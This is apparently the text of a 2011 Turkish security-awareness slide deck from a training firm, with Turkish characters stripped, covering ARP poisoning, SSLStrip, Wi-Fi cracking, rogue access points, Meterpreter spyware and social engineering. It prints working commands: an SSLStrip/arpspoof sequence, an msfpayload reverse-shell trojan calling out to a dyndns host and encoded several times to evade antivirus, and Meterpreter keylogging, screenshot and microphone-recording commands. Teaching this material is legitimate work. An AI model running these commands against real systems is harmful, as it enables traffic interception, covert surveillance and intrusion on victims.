Gvenlik Riskleri ve Saldr Yntemleri

Ozan UARoucar@bga.com.tr

Bilgi Gvenlii Akademisi (BGA)

Melike Pnar Koleji BURSA 2011

Hacking Kltr Hakknda

Bilgisayar yeralt dnyas bir aynal salondur. Gerek bklr, dorular klr.

- Sfra Doru

www.bga.com.tr 2

Bilinen Baz Yanllar

Yanl bildiimiz veya yanl tantrldmz

Hack ve Hacker kavramlarna bir bakalm

www.bga.com.tr 3

C|EH TRKYE

Bilgi gvenlii kapsamnda biliim gnlllerine destek vermek iin bilgi birikimini ve tecrbelerini paylaan Ethical Hackerlarn oluturduu bir bilgi gvenlii ktphanesidir.

www.bga.com.tr 4

Bilgi Gvenlii Akademisi

2008 ylnda Trkiyedeki bilgi gvenlii sektrne profesyonel anlamda destek olmak amacyla kurulan Bilgi Gvenlii AKADEMS ileri seviye gvenlik danmanl ve gvenlik eitimleri konularnda kurumlara hizmet vermektedir.

Aktif alma hayatna balad 2008 ylndan bu yana zel, kamu ve askeri alanda 300n zerinde eitim ve danmanlk referans olmutur.

Sektrn geliimine katkda bulunmak amacyla her yl 10nun zerinde bilgi gvenlii etkinliine destek veren Bilgi Gvenlii AKADEMSnin temel hedefi Trkiye ve dnyada rn bamsz gvenlik anlaynn yerlemesidir.

www.bga.com.tr 5

Hack

Bir bilgisayarla bir hedefe ynelik olarak deil de oyuncu ve aratrmac biimde etkileim kurmak.

dehann/hnerin doru uygulan olarak tanmlanabilir.

Sonu abuk bir yama olsun, ya da dikkatlice yaratlm bir sanat eseri olsun, iindeki zekaya hayran kalmalsnz.

www.bga.com.tr 6

Hacker

Dilimizde bir karl yok fakat stad kelimesi

hacker yerine kullanlabilir.

Programlanabilen sistemlerin, yalnzca gereken

minimumu renmeyi tercih eden ounluun aksine,

detaylarn ve yeteneklerinin nasl geniletilebileceini

aratrmaktan holanan kimse

Herhangi bir konuda uzman ya da merakl kimse.

rnein astronomi hacker'

www.bga.com.tr 7

Cracker

Gazetecilerin hacker terimini yanl kullanarak

tarif ettikleri bilgisayar korsanlarn tanmlamak iin

hacker'lar tarafndan 1985'te oluturulan bir terim.

www.bga.com.tr 8

Bu kiiler bilgiyasar sistemlerini krarak zarar vermekten zevk alrlar.ounluu gen erkeklerden oluan bu gurup kendilerine toplum ierisinde yksek sesle hacker demeyi severler.

Lamer

Hacking, Cracking gibi konularda bilgisi olmadan veya

kulaktan dolma bilgilerle hacker gibi davranmaya

alan kiilerdir...

statlar tarafndan sevilmezler ve biraz da alayc

ekilde Lamer olarak adlandrlrlar.

Eer bir sisteme girmeyi baarrlarsa

ok fazla iz brakrlar, izlerini silemezler

veya girdikleri sistemden kendilerine

virs bulatrabilirler.

www.bga.com.tr 9

Sunum erii

A Tabanl Saldrlar (Uygulamal)

ARP/RARP Protokolleri ve Zayflklar

Yerel An Zehirlenmesi

Ortadaki Adam (mitm) Saldrs

Facebook, MSN Yazmalarn Grntleme, Mailleri ele geirme

SSL Trafiinde araya girme (SSLStrip)

Kablosuz Alarda Gvenlik

WEP/WPA ifrelemelerinin krlmas

Sahte Kablosuz Eriim Noktalar ( Uygulamal )

www.bga.com.tr 10

Sunum erii | Devam

Casus yazlmlarn yaratt tehlikeler (Uygulamal)

Antivirus yazlmlar nasl atlatlr ?

Gelimi bir casus yazlm olarak Meterpreter

Webcam grntlerini ele geirme

Ortam dinleme

Ekran grnts alma

Klavye girilerini yakalamak

Sosyal Mhendis Saldrlar

nsan tabanl zafiyetler ve Aldatma sanat

rnek ses kayd

Sosyal Mhendislik Arac (SET)

www.bga.com.tr 11

A Tabanl Saldrlar

ARP/RARP Protokol;

Bu protokol iki bilgisayarn haberlemesi iin gerekli fiziksel adreslerin tespit edilmesini salar.

Aa balanan bir A bilgisayar, B bilgisayarna ulamak istedii zaman B bilgisayarnn IP adresine karlk gelen MAC adresini bulmak iin tm aa broadcast ile yayn yapar.

Broadcast istei ada bulunan tm bilgisayarlara iletili, fakat yant yalnzca B bilgisayarndan dner.

www.bga.com.tr 12

A Tabanl Saldrlar

Yerel An Zehirlenmesi;

Saldrgan, A bilgisayarna sahte arp paketleri gndererek arp nbelleini zehirleyecek ve tm veriler saldrgann MAC adresine gnderilecektir.

www.bga.com.tr 13

A Tabanl Saldrlar

MITM Saldrs;

Ortadaki adam saldrsnda, saldrgan kaynak ve hedef iki sistemi kandrarak trafiin zerinden gemesini amalar.

www.bga.com.tr 14

A Tabanl Saldrlar | Uygulama

Yerel An Zehirlenmesi.BackTrack Linux zerinde Ettercap ile uygulama;

FTP, SMTP, HTTP parolalar

www.bga.com.tr 15

A Tabanl Saldrlar | Uygulama

Windows zerinde Cain&Abel yazlm ile uygulama

www.bga.com.tr 16

Facebook Chat Forensics

Facebook Chat kaytlar;

fbs.py cehturkiye ekibi tarafndan network forensic arac olarak yazlmtr.

www.bga.com.tr 17

SSL trafiinde araya girme (SSLStrip)

SSLStrip alma ekli

1. Saldrgan, kurban sistemin trafiini zerinden geirir.

2. Saldrgan, hedef sunucudan gelen https balantlarn kendi zerinde sonlandrp istemciye http olarak iletir.

3. stemciden dnen trafik okunabilir olduundan, saldrgan tm verileri grntleyebilir/kaydedebilir.

www.bga.com.tr 18

SSL trafiinde araya girme (SSLStrip)

Saldr denemesi;

1. Sistemini ynlendirme moduna geirecho "1" > /proc/sys/net/ipv4/ip_forward

2. Hedef portu 80 olan trafii, dinlediin porta (88) ynlendir.iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 88

3. Hedef sistem ile ynlendirici arasna girarpspoof -i -t

4. SSLStrip ile trafii kaydetpython sslstrip.py -f -p -w veriler -l 88

www.bga.com.tr 19

Saldr ile elde edilen

bilgiler

Kablosuz Alarda Gvenlik

WEP korumal alar krmak; Algoritmas zayftr

Parolay krmak iin yeterli sayda paket yakalamak gerekiyor

Parolann kark ve uzun olmas nemli deildir.

Video: http://www.cehturkiye.com/index.php/2009/01/11/wireless-networkleri-hacklemek/wireless-networkleri-hacklemek.html

www.bga.com.tr 20

Kablosuz Alarda Gvenlik

WPA korumal alar krmak;

Gl bir algoritmas bulunuyor (henz krlamad)

Parolay krmak iin yeterli sayda paket yakalamak gerekiyor

Parolann kark ve uzun olmas krma ilemini uzatr.

Belge: http://www.cehturkiye.com/index.php/2010/06/07/wireless-pentest-wpa-crack/wireless-pentest-wpa-crack.html

www.bga.com.tr 21

Sahte Kablosuz Eriim Noktalar(Uygulamal)

Yalnzca amac kt olduu iin sahte olarak isimlendirilir, gereinden ayrt edilemez

Kablosuz internet kullanclarn hedefler

Kablosuz a istemcileri, saldrgan tarafndan yayn yapan kablosuz aa dahil oldukdan sonra, tm internet trafii kaydedilir.

DNS nbelleini zehirleyerek sahte eriim sayfalar ile kimlik av yapabilir.

www.bga.com.tr 22

Sahte Kablosuz Eriim Noktalar(Uygulamal)

www.bga.com.tr 23

Saldr yaplan sistemden ekran grnts

Sahte Kablosuz Eriim Noktalar(Uygulamal)

www.bga.com.tr 24

nternete ilk girildii anda, sahte bir gncelleme mesaj ile casus yazlm kurban bilgisayara yklenir.

Antivirus yazlmlar nasl atlatlr ?

www.bga.com.tr 25

mza tabanl ve shell test yapan antivirusler

Sezgisel Antiviruslerin alma mant ?

Saldr tespit ve Engelleme Sistemleri

./msfpayloadwindows/shell_reverse_tcpLHOST=ozan.dyndns.org LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe> /tmp/trojan.exe

Gelimi bir casus yazlm olarak Meterpreter

www.bga.com.tr 26

Keylogger olarak kullanm;

> keyscan_start

> keyscan_dump

Hedefin ekran grntsn ele geirme

> screeshot

Gelimi bir casus yazlm olarak Meterpreter

www.bga.com.tr 27

Ortam Dinleme

Kurban sistemde bir mikrofon varsa, ortam dinlemesi yaplabilir.> record_mic -d 25 // 25. sn boyunca dinleme yap ve kaydet.

[*] Starting...

[*] Stopped

Audio saved to: /opt/metasploit3/msf3/nFqYscte.wav

Webcam Grntsn Ele Geirme

Sosyal Mhendis Saldrlar

www.bga.com.tr 28

nsan tabanl zaafiyetler ve Aldatma sanat

rnek ses kayd

Sosyal Mhendislik Arac (SET)

Sosyal Mhendis Saldrlar

www.bga.com.tr 29

Gerek Dnyadan Hacking rnekleri

www.bga.com.tr 30

Hepsibursada.com Saldr Giriimi;

Cookies manipulationJavaScript kontrollerini atlatmakFarkl kullancnn profil bilgilerini ele geirmek

Gerek Dnyadan Hacking rnekleri

www.bga.com.tr 31

xxxx.com ana saldr denemesi;

alan Aktif Servislerin Tespiti SSH Servisi Parola Krma Saldrs Exploit ile sisteme giri. Giri sonras network kefi Arkakap oluturma

Sorular ?